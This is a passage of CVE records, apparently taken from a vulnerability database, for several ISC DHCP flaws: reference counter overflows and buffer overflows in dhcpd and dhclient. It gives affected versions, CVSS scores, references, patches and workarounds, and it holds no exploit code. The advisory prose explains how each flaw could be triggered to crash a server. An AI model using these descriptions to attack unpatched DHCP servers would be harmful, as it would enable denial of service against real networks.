            "name": "[debian-lts-announce] 20221010 [SECURITY] [DLA 3146-1] isc-dhcp security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00015.html"
          },
          {
            "name": "FEDORA-2022-f5a45757df",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QQXYCIWUDILRCNBAIMVFCSGXBRKEPB4K/"
          },
          {
            "name": "FEDORA-2022-9ca9a94e28",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T6IBFH4MRRNJQVWEKILQ6I6CXWW766FX/"
          },
          {
            "name": "FEDORA-2022-c4f274a54f",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SARIK7KZ7MGQIWDRWZFAOSQSPXY4GOU/"
          },
          {
            "name": "GLSA-202305-22",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://security.gentoo.org/glsa/202305-22"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ISC DHCP",
          "vendor": "ISC",
          "versions": [
            {
              "status": "affected",
              "version": "4.4.0 through versions before 4.4.3-P1"
            },
            {
              "status": "affected",
              "version": "4.1 ESV 4.1-ESV-R1 through versions before 4.1-ESV-R16-P1"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "ISC would like to thank VictorV of Cyber Kunlun Lab for discovering and reporting this issue."
        }
      ],
      "datePublic": "2022-10-05T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "In ISC DHCP 4.4.0 -\u003e 4.4.3, ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16-P1, when the function option_code_hash_lookup() is called from add_option(), it increases the option\u0027s refcount field. However, there is not a corresponding call to option_dereference() to decrement the refcount field. The function add_option() is only used in server responses to lease query packets. Each lease query response calls this function for several options, so eventually, the reference counters could overflow and cause the server to abort."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "We are not aware of any active exploits."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "A DHCP server configured with allow leasequery;, a remote machine with access to the server can send lease queries for the same lease multiple times, leading to the add_option() function being repeatedly called. This could cause an option\u0027s refcount field to overflow and the server to abort. Internally, reference counters are integers and thus overflow at 2^31 references, so even at 1000 lease query responses per second, it would take more than three weeks to crash the server. Affects In ISC DHCP 4.4.0 -\u003e 4.4.3, ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16-P1",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-05-03T00:00:00.000Z",
        "orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
        "shortName": "isc"
      },
      "references": [
        {
          "url": "https://kb.isc.org/docs/cve-2022-2928"
        },
        {
          "name": "[debian-lts-announce] 20221010 [SECURITY] [DLA 3146-1] isc-dhcp security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00015.html"
        },
        {
          "name": "FEDORA-2022-f5a45757df",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QQXYCIWUDILRCNBAIMVFCSGXBRKEPB4K/"
        },
        {
          "name": "FEDORA-2022-9ca9a94e28",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T6IBFH4MRRNJQVWEKILQ6I6CXWW766FX/"
        },
        {
          "name": "FEDORA-2022-c4f274a54f",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SARIK7KZ7MGQIWDRWZFAOSQSPXY4GOU/"
        },
        {
          "name": "GLSA-202305-22",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://security.gentoo.org/glsa/202305-22"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to the patched release most closely related to your current version of ISC DHCP. These can all be downloaded from https://www.isc.org/downloads.  4.4.3-P1 4.1-ESV-R16-P2"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "An option refcount overflow exists in dhcpd",
      "workarounds": [
        {
          "lang": "en",
          "value": "Disable lease query on the server for DHCPv4 or restart the server periodically."
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
    "assignerShortName": "isc",
    "cveId": "CVE-2022-2928",
    "datePublished": "2022-10-07T04:45:11.751Z",
    "dateReserved": "2022-08-22T00:00:00.000Z",
    "dateUpdated": "2024-09-17T00:21:40.167Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2021-25217 (GCVE-0-2021-25217)

Vulnerability from nvd – Published: 2021-05-26 22:10 – Updated: 2024-09-16 22:08
Title
A buffer overrun in lease file parsing code can be used to exploit a common vulnerability shared by dhcpd and dhclient
Summary
In ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16, ISC DHCP 4.4.0 -> 4.4.2 (Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability), The outcome of encountering the defect while reading a lease that will trigger it varies, according to: the component being affected (i.e., dhclient or dhcpd) whether the package was built as a 32-bit or 64-bit binary whether the compiler flag -fstack-protection-strong was used when compiling In dhclient, ISC has not successfully reproduced the error on a 64-bit system. However, on a 32-bit system it is possible to cause dhclient to crash when reading an improper lease, which could cause network connectivity problems for an affected system due to the absence of a running DHCP client process. In dhcpd, when run in DHCPv4 or DHCPv6 mode: if the dhcpd server binary was built for a 32-bit architecture AND the -fstack-protection-strong flag was specified to the compiler, dhcpd may exit while parsing a lease file containing an objectionable lease, resulting in lack of service to clients. Additionally, the offending lease and the lease immediately following it in the lease database may be improperly deleted. if the dhcpd server binary was built for a 64-bit architecture OR if the -fstack-protection-strong compiler flag was NOT specified, the crash will not occur, but it is possible for the offending lease and the lease which immediately followed it to be improperly deleted.
CWE
  • Program code used by the ISC DHCP package to read and parse stored leases has a defect that can be exploited by an attacker to cause one of several undesirable outcomes, depending on the component attacked and the way in which it was compiled. Because of a discrepancy between the code which handles encapsulated option information in leases transmitted "on the wire" and the code which reads and parses lease information after it has been written to disk storage, it is potentially possible for an attacker to deliberately cause a situation where: dhcpd, while running in DHCPv4 or DHCPv6 mode, or dhclient, the ISC DHCP client implementation will attempt to read a stored lease that contains option information which will trigger a bug in the option parsing code. Affects ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16, ISC DHCP 4.4.0 -> 4.4.2. Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability. Affects both dhcpd (server) and dhcpcd (client).
Assigner
isc
Impacted products
Vendor: ISC
Product: ISC DHCP
Version: Affected: 4.1 ESV, < 4.1-ESV-R16-P1 (custom); Affected: 4.4, < 4.4.2-P1 (custom)
Date Public
2021-05-26 00:00
Credits
ISC would like to thank Jon Franklin from Dell and Pawel Wieczorkiewicz from Amazon Web Services for (independently) reporting this vulnerability.

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T19:56:11.067Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kb.isc.org/docs/cve-2021-25217"
          },
          {
            "name": "[oss-security] 20210526 ISC has disclosed a vulnerability in ISC DHCP (CVE-2021-25217)",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2021/05/26/6"
          },
          {
            "name": "FEDORA-2021-08cdb4dc34",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z2LB42JWIV4M4WDNXX5VGIP26FEYWKIF/"
          },
          {
            "name": "[debian-lts-announce] 20210603 [SECURITY] [DLA 2674-1] isc-dhcp security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00002.html"
          },
          {
            "name": "FEDORA-2021-8ca8263bde",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5QI4DYC7J4BGHEW3NH4XHMWTHYC36UK4/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-406691.pdf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220325-0011/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf"
          },
          {
            "name": "GLSA-202305-22",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://security.gentoo.org/glsa/202305-22"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ISC DHCP",
          "vendor": "ISC",
          "versions": [
            {
              "lessThan": "4.1-ESV-R16-P1",
              "status": "affected",
              "version": "4.1 ESV",
              "versionType": "custom"
            },
            {
              "lessThan": "4.4.2-P1",
              "status": "affected",
              "version": "4.4",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "ISC would like to thank Jon Franklin from Dell and Pawel Wieczorkiewicz from Amazon Web Services for (independently) reporting this vulnerability."
        }
      ],
      "datePublic": "2021-05-26T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "In ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16, ISC DHCP 4.4.0 -\u003e 4.4.2 (Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability), The outcome of encountering the defect while reading a lease that will trigger it varies, according to: the component being affected (i.e., dhclient or dhcpd) whether the package was built as a 32-bit or 64-bit binary whether the compiler flag -fstack-protection-strong was used when compiling In dhclient, ISC has not successfully reproduced the error on a 64-bit system. However, on a 32-bit system it is possible to cause dhclient to crash when reading an improper lease, which could cause network connectivity problems for an affected system due to the absence of a running DHCP client process. In dhcpd, when run in DHCPv4 or DHCPv6 mode: if the dhcpd server binary was built for a 32-bit architecture AND the -fstack-protection-strong flag was specified to the compiler, dhcpd may exit while parsing a lease file containing an objectionable lease, resulting in lack of service to clients. Additionally, the offending lease and the lease immediately following it in the lease database may be improperly deleted. if the dhcpd server binary was built for a 64-bit architecture OR if the -fstack-protection-strong compiler flag was NOT specified, the crash will not occur, but it is possible for the offending lease and the lease which immediately followed it to be improperly deleted."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "We are not aware of any active exploits."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Program code used by the ISC DHCP package to read and parse stored leases has a defect that can be exploited by an attacker to cause one of several undesirable outcomes, depending on the component attacked and the way in which it was compiled.  Because of a discrepancy between the code which handles encapsulated option information in leases transmitted \"on the wire\" and the code which reads and parses lease information after it has been written to disk storage, it is potentially possible for an attacker to deliberately cause a situation where:      dhcpd, while running in DHCPv4 or DHCPv6 mode, or     dhclient, the ISC DHCP client implementation  will attempt to read a stored lease that contains option information which will trigger a bug in the option parsing code.  Affects ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16, ISC DHCP 4.4.0 -\u003e 4.4.2. Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability.  Affects both dhcpd (server) and dhcpcd (client).",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-05-03T00:00:00.000Z",
        "orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
        "shortName": "isc"
      },
      "references": [
        {
          "url": "https://kb.isc.org/docs/cve-2021-25217"
        },
        {
          "name": "[oss-security] 20210526 ISC has disclosed a vulnerability in ISC DHCP (CVE-2021-25217)",
          "tags": [
            "mailing-list"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2021/05/26/6"
        },
        {
          "name": "FEDORA-2021-08cdb4dc34",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z2LB42JWIV4M4WDNXX5VGIP26FEYWKIF/"
        },
        {
          "name": "[debian-lts-announce] 20210603 [SECURITY] [DLA 2674-1] isc-dhcp security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00002.html"
        },
        {
          "name": "FEDORA-2021-8ca8263bde",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5QI4DYC7J4BGHEW3NH4XHMWTHYC36UK4/"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-406691.pdf"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20220325-0011/"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf"
        },
        {
          "name": "GLSA-202305-22",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://security.gentoo.org/glsa/202305-22"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to the patched release most closely related to your current version of ISC DHCP:\n\n    ISC DHCP 4.1-ESV-R16-P1\n    ISC DHCP 4.4.2-P1"
        }
      ],
      "source": {
        "discovery": "USER"
      },
      "title": "A buffer overrun in lease file parsing code can be used to exploit a common vulnerability shared by dhcpd and dhclient",
      "workarounds": [
        {
          "lang": "en",
          "value": "None known."
        }
      ],
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
    "assignerShortName": "isc",
    "cveId": "CVE-2021-25217",
    "datePublished": "2021-05-26T22:10:11.312Z",
    "dateReserved": "2021-01-15T00:00:00.000Z",
    "dateUpdated": "2024-09-16T22:08:32.175Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2018-5732 (GCVE-0-2018-5732)

Vulnerability from nvd – Published: 2019-10-09 14:17 – Updated: 2024-09-16 18:19
Title
A specially constructed response from a malicious server can cause a buffer overflow in dhclient
Summary
Failure to properly bounds-check a buffer used for processing DHCP options allows a malicious server (or an entity masquerading as a server) to cause a buffer overflow (and resulting crash) in dhclient by sending a response containing a specially constructed options section. Affects ISC DHCP versions 4.1.0 -> 4.1-ESV-R15, 4.2.0 -> 4.2.8, 4.3.0 -> 4.3.6, 4.4.0
CWE
  • Affected versions of dhclient should crash due to an out-of-bounds memory access if they receive and process a triggering response packet. However, buffer overflow outcomes can vary by operating system, and outcomes such as remote code execution may be possible in some circumstances. Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution, but we cannot rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur.
Assigner
isc
References
https://kb.isc.org/docs/aa-01565 x_refsource_CONFIRM
Impacted products
Vendor: ISC
Product: ISC DHCP
Version: Affected: ISC DHCP 4.1.0 -> 4.1-ESV-R15, 4.2.0 -> 4.2.8, 4.3.0 -> 4.3.6, 4.4.0
Date Public
2018-02-28 00:00
Credits
ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability.

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T05:40:51.169Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/docs/aa-01565"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ISC DHCP",
          "vendor": "ISC",
          "versions": [
            {
              "status": "affected",
              "version": "ISC DHCP 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability."
        }
      ],
      "datePublic": "2018-02-28T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Failure to properly bounds-check a buffer used for processing DHCP options allows a malicious server (or an entity masquerading as a server) to cause a buffer overflow (and resulting crash) in dhclient by sending a response containing a specially constructed options section. Affects ISC DHCP versions 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Affected versions of dhclient should crash due to an out-of-bounds memory access if they receive and process a triggering response packet. However, buffer overflow outcomes can vary by operating system, and outcomes such as remote code execution may be possible in some circumstances. Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution, but we cannot rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur.",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-10-09T14:17:14.000Z",
        "orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
        "shortName": "isc"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/docs/aa-01565"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to the patched release most closely related to your current version of DHCP. ISC DHCP releases are available from https://www.isc.org/downloads.\n\n \u003e=   DHCP 4.1-ESV-R15-P1\n \u003e=   DHCP 4.3.6-P1\n \u003e=   DHCP 4.4.1"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "A specially constructed response from a malicious server can cause a buffer overflow in dhclient",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-officer@isc.org",
          "DATE_PUBLIC": "2018-02-28T00:00:00.000Z",
          "ID": "CVE-2018-5732",
          "STATE": "PUBLIC",
          "TITLE": "A specially constructed response from a malicious server can cause a buffer overflow in dhclient"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "ISC DHCP",
                      "version": {
                        "version_data": [
                          {
                            "version_name": "ISC DHCP",
                            "version_value": "4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "ISC"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability."
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Failure to properly bounds-check a buffer used for processing DHCP options allows a malicious server (or an entity masquerading as a server) to cause a buffer overflow (and resulting crash) in dhclient by sending a response containing a specially constructed options section. Affects ISC DHCP versions 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Affected versions of dhclient should crash due to an out-of-bounds memory access if they receive and process a triggering response packet. However, buffer overflow outcomes can vary by operating system, and outcomes such as remote code execution may be possible in some circumstances. Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution, but we cannot rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur."
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://kb.isc.org/docs/aa-01565",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/docs/aa-01565"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Upgrade to the patched release most closely related to your current version of DHCP. ISC DHCP releases are available from https://www.isc.org/downloads.\n\n \u003e=   DHCP 4.1-ESV-R15-P1\n \u003e=   DHCP 4.3.6-P1\n \u003e=   DHCP 4.4.1"
          }
        ],
        "source": {
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
    "assignerShortName": "isc",
    "cveId": "CVE-2018-5732",
    "datePublished": "2019-10-09T14:17:14.251Z",
    "dateReserved": "2018-01-17T00:00:00.000Z",
    "dateUpdated": "2024-09-16T18:19:36.136Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2018-5733 (GCVE-0-2018-5733)

Vulnerability from nvd – Published: 2019-01-16 20:00 – Updated: 2025-04-25 23:02
Title
A malicious client can overflow a reference counter in ISC dhcpd
Summary
A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash. Affects ISC DHCP 4.1.0 -> 4.1-ESV-R15, 4.2.0 -> 4.2.8, 4.3.0 -> 4.3.6, 4.4.0.
CWE
  • Successful exploitation of this vulnerability may exhaust the memory available to dhcpd and/or cause it to crash, resulting in a denial of service to clients.
Assigner
isc
References
https://kb.isc.org/docs/aa-01567 x_refsource_CONFIRM
https://access.redhat.com/errata/RHSA-2018:0469 vendor-advisory, x_refsource_REDHAT
https://www.debian.org/security/2018/dsa-4133 vendor-advisory, x_refsource_DEBIAN
https://usn.ubuntu.com/3586-2/ vendor-advisory, x_refsource_UBUNTU
https://access.redhat.com/errata/RHSA-2018:0483 vendor-advisory, x_refsource_REDHAT
https://usn.ubuntu.com/3586-1/ vendor-advisory, x_refsource_UBUNTU
http://www.securityfocus.com/bid/103188 vdb-entry, x_refsource_BID
http://www.securitytracker.com/id/1040437 vdb-entry, x_refsource_SECTRACK
https://lists.debian.org/debian-lts-announce/2018… mailing-list, x_refsource_MLIST
Impacted products
Vendor: ISC
Product: ISC DHCP
Version: Affected: ISC DHCP 4.1.0 -> 4.1-ESV-R15, 4.2.0 -> 4.2.8, 4.3.0 -> 4.3.6, 4.4.0
Date Public
2018-02-28 00:00
Credits
ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability.

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-04-25T23:02:52.084Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/docs/aa-01567"
          },
          {
            "name": "RHSA-2018:0469",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:0469"
          },
          {
            "name": "DSA-4133",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2018/dsa-4133"
          },
          {
            "name": "USN-3586-2",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/3586-2/"
          },
          {
            "name": "RHSA-2018:0483",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:0483"
          },
          {
            "name": "USN-3586-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/3586-1/"
          },
          {
            "name": "103188",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/103188"
          },
          {
            "name": "1040437",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1040437"
          },
          {
            "name": "[debian-lts-announce] 20180322 [SECURITY] [DLA 1313-1] isc-dhcp security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00015.html"
          },
          {
            "url": "https://security.netapp.com/advisory/ntap-20250425-0010/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ISC DHCP",
          "vendor": "ISC",
          "versions": [
            {
              "status": "affected",
              "version": "ISC DHCP 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability."
        }
      ],
      "datePublic": "2018-02-28T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash. Affects ISC DHCP 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Successful exploitation of this vulnerability may exhaust the memory available to dhcpd and/or cause it to crash, resulting in a denial of service to clients.",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-01-17T10:57:01.000Z",
        "orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
        "shortName": "isc"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/docs/aa-01567"
        },
        {
          "name": "RHSA-2018:0469",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:0469"
        },
        {
          "name": "DSA-4133",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2018/dsa-4133"
        },
        {
          "name": "USN-3586-2",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/3586-2/"
        },
        {
          "name": "RHSA-2018:0483",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
